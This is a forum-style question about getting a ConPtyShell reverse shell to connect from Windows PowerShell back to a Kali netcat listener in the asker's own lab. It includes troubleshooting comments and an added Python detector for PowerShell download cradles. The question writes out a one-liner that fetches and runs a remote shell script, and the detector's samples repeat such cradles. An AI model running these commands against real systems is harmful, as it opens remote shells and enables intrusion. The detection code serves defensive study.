
I was trying to spawn a reverse shell to connect to a Windows computer using netcat. But Windows doesn't have ncat installed by default, so I tried to connect to PowerShell instead. I specified the port I was listening on. Here is the command I used:

stty raw -echo; (stty size; cat) | nc -lvnp 87

Then I tried to connect to the port on windows:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell (IP) 87

But it wasn't detected. After a few seconds it threw me an error message saying:

ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060
   at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort)
   at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell)
   at ConPtyShellMainClass.ConPtyShellMain(String[] args)

Volkov
  • Add more information. Where\What did you run `stty`/`nc` from, another windows machine? Which device are you expecting to initiate the connection? Verify whether your listener *is* actually listening, using `netstat` for example. If it is listening, then check whether it was connectable, via nmap or `Test-NetConnection` – Cpt.Whale Apr 29 '22 at 17:16
  • More information: I'm using a Kali Linux VirtualBox VM on my Windows computer. I wanted to connect to my Windows PowerShell since it's already installed, unlike netcat. So the first thing I did was set up a listener on port 87, using the first command that I posted (stty raw -echo; (stty size; cat) | nc -lvnp 87). The second step was running the second command (IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell (IP) 87). The rest is what I already said above. Thx @Cpt.Whale, I will try tomorrow. – Volkov Apr 29 '22 at 22:11
  • I used netstat command to check if my listener is listening and it is. I tried to initiate connection and it didn't work. I was using this cheat sheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md (The commands I was using are at the bottom of the page) – Volkov May 01 '22 at 10:21
  • To continue with the obvious, can you ping from VM>Host and in reverse? Can you connect to the port (past host firewall etc) with `Test-NetConnection $ip -Port 87`? The error 10060 in the question is just a connection timed out message, so probably more network-related than anything. – Cpt.Whale May 02 '22 at 15:42
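From the defender's side, the one-liner in the question is exactly the kind of download cradle that PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records verbatim. The following is an added example, not code from the question or from the ConPtyShell project: a small Python classifier run over constructed 4104 script-block texts that flags IEX/IWR-style cradles, the Invoke-ConPtyShell tool name, and the callback host and port it was given. The sample lines and the 10.0.0.5 address are constructed for the demo.

```python
import re

# Constructed script-block texts as a 4104 event would carry them (not real logs).
# The second line mirrors the command in the question with a made-up callback IP.
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/"
    "Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.5 87",
    "Invoke-WebRequest -Uri https://example.invalid/update.zip -OutFile C:\\temp\\update.zip",
    "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
]

# Execution primitives and fetch primitives; a cradle needs one of each in the same block.
EXEC_RE = re.compile(r"(?:\biex\b|invoke-expression)")
FETCH_RE = re.compile(r"(?:\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)")
# Tool names worth a dedicated alert regardless of how they were loaded.
TOOL_NAMES = ("invoke-conptyshell", "conptyshell")
# Invoke-ConPtyShell <host> <port>: extract where the shell would call back to.
CALLBACK_RE = re.compile(r"invoke-conptyshell\s+(\S+)\s+(\d+)")


def classify(script_block: str) -> list:
    """Return a list of finding tags for one script-block text (empty if benign)."""
    s = script_block.lower()
    findings = []
    if EXEC_RE.search(s) and FETCH_RE.search(s):
        findings.append("download-cradle")
    for name in TOOL_NAMES:
        if name in s:
            findings.append(f"known-tool:{name}")
            break
    m = CALLBACK_RE.search(s)
    if m:
        findings.append(f"callback:{m.group(1)}:{m.group(2)}")
    return findings


def scan(events) -> dict:
    """Map event index -> findings for every event that produced at least one."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(tags)}")
```

A plain Invoke-WebRequest to a file (the third sample) is deliberately not flagged; only the fetch-and-execute combination or the tool name itself raises a finding.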

0 Answers